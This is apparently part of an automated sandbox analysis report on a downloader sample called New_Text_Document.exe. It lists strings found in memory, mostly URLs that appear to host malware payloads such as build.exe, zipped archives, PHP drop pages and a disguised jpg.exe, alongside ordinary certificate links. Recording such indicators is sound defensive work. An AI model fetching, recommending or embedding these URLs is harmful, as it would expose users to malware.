                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://coadymarine.com/Admin/89wkR/
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000035F3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://coalizaobrasil.com.br/ete/
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://colisumy.com/dl/build.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://colisumy.com/dl/build2.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://colisumy.com/dl/buildz.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000035F3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://creativeignite.com/evl/
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://critlcalriver.com/site-assets/Rules.doc
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.0000000003621000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
                    Source: svchost.exe, 00000004.00000002.1454572172.000002548A200000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033CF000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.000000000351F000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.0000000003532000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000013.00000002.1457656685.000001947FAC3000.00000004.00000001.00020000.00000000.sdmp, raserver.exe, 00000014.00000003.1558158883.0000000007CCE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                    Source: raserver.exe, 00000014.00000003.1558158883.0000000007CCE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
                    Source: explorer.exe, 0000000C.00000000.1298597652.0000000008F4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2519047272.0000000008F4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2272829573.000000000730A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2502572191.0000000007306000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000000.1291540704.0000000007306000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033CF000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.000000000351F000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000013.00000002.1457656685.000001947FAC3000.00000004.00000001.00020000.00000000.sdmp, raserver.exe, 00000014.00000003.1558158883.0000000007CCE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033CF000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.000000000351F000.00000004.00000800.00020000.00000000.sdmp, setup.exe, 00000013.00000002.1457656685.000001947FAC3000.00000004.00000001.00020000.00000000.sdmp, raserver.exe, 00000014.00000003.1558158883.0000000007CCE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                    Source: raserver.exe, 00000014.00000003.1558158883.0000000007CCE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
                    Source: raserver.exe, 00000014.00000003.1558158883.0000000007CCE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
                    Source: explorer.exe, 0000000C.00000000.1298597652.0000000008F4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2519047272.0000000008F4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2272829573.000000000730A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2502572191.0000000007306000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000000.1291540704.0000000007306000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
                    Source: raserver.exe, 00000014.00000003.1558158883.0000000007CCE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.0000000003621000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://d1.udashi.com/soft/aqsd/5084/%E5%A4%A9%E9%99%8D%E6%BF%80%E5%85%89%E7%82%AE-%E5%9B%BE%E5%83%8F
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://d1.udashi.com/soft/bgrj/5694/%E5%88%9B%E8%BE%89%E4%BC%81%E4%B8%9A%E5%90%8D%E5%BD%95%E4%BF%A1%
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://d1.udashi.com/soft/dnyx/20812/richedit.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://d1.udashi.com/soft/wlyy/16396/jxszdjp.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://d1.udashi.com/soft/xzgj/3839/%E6%85%95%E8%AF%BE%E7%BD%91%E8%A7%86%E9%A2%91%E8%A7%A3%E6%9E%90%
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://dating.khokhas.co.za/judpotp.rar
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000035F3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ddservices.com.mx/ool/
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://demonware.online/AuDemon1/dashboard/programs/uploads/OYjNZ83sjKRthbBx6R8PTMnhwyUfbG/dwrblood.
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://dental.xiaoxiao.media/css/http://OCT/SVAJ01CBXvj8Ax/
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://dental.xiaoxiao.media/css/http:/OCT/SVAJ01CBXvj8Ax/
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://destinymc.co.za/u5nmsr.zip
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.0000000003621000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://devpassion.com.mx/iot/
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://diclegrup.org/YFRFklulPjtNVV25.bin
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://dl.198424.com/soft1/sc2_tool.zip
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://dl.9xu.com/devilish.php
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://dl.9xu.com/js/ueditor/lang/zh-cn/images/horn.php
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://dl.9xu.com/js/ueditor/lang/zh-cn/images/inverting.php
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://dl.9xu.com/js/ueditor/lang/zh-cn/images/mug.php
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://dl.9xu.com/js/ueditor/lang/zh-cn/images/subdivider.php
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://dl.9xu.com/js/ueditor/lang/zh-cn/images/superstitions.php
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://dl.9xu.com/savageness.php
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://dlqsclub.com/wp-content/uploads/4ImMYkgI44psweaKI/
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://dlqsclub.com/wp-content/uploads/8ST56kZvvQ/
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://dom.daf.free.fr/jeux/dart.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://down.udashi.com/pe/driverexportpe.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://download.caihong.com/gamewd/yhdl.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://download.doumaibiji.cn/doumai/news2/v1.0.7.01/news2_01.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://download.skycn.com/hao123-soft-online-bcs/soft/D/2014-06-12_djylh.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://download.skycn.com/hao123-soft-online-bcs/soft/P/pocketrar350sc.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000035F3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://dpp.hn/tun/
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://drive.google.com.it-barcelona.com/frm0reseen/PrntScrnOfAMZOrderID.jpg.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://dukaree.com/images_old/HmFhaq2E
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://dukaree.com/images_old/pZqGHXN39l8/
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://dukaree.com/wp-includes/6711444_861021/
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://dukaree.com/wp-includes/gUhbKKKiUw3Q2nUWWFiRkkh2/
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://dw.c4kdeliver.top/2.gif
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://dw.c4kdeliver.top/bashirc.x86_64
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://dw.c4kdeliver.top/x86_64
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://easyrentbyowner.com/stockholding.php
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://easyrentbyowner.com/thousandth.php
                    Source: svchost.exe, 00000004.00000003.1449232529.0000025485504000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://elturky.net/ERP/public/js/postmon.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000035F3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://empresape.com/eldi/
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://enfantfoundation.com/amday.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://erkaradyator.com.tr/Areas/1Dg2PeStqNlOjuPP3fu/
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://erkaradyator.com.tr/Areas/My5PdKnB/
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://esquiudigital.com/diario/eki2MIqTWJR/?i=1
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://eurooknamsk.ru/headers/azienda/Agenzia_E.zip
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://eurooknamsk.ru/headers/azienda/Agenzia_E2.zip
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://eurooknamsk.ru/headers/azienda/Agenzia_E3.zip
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://eurooknamsk.ru/headers/azienda/Agenzia_E4.zip
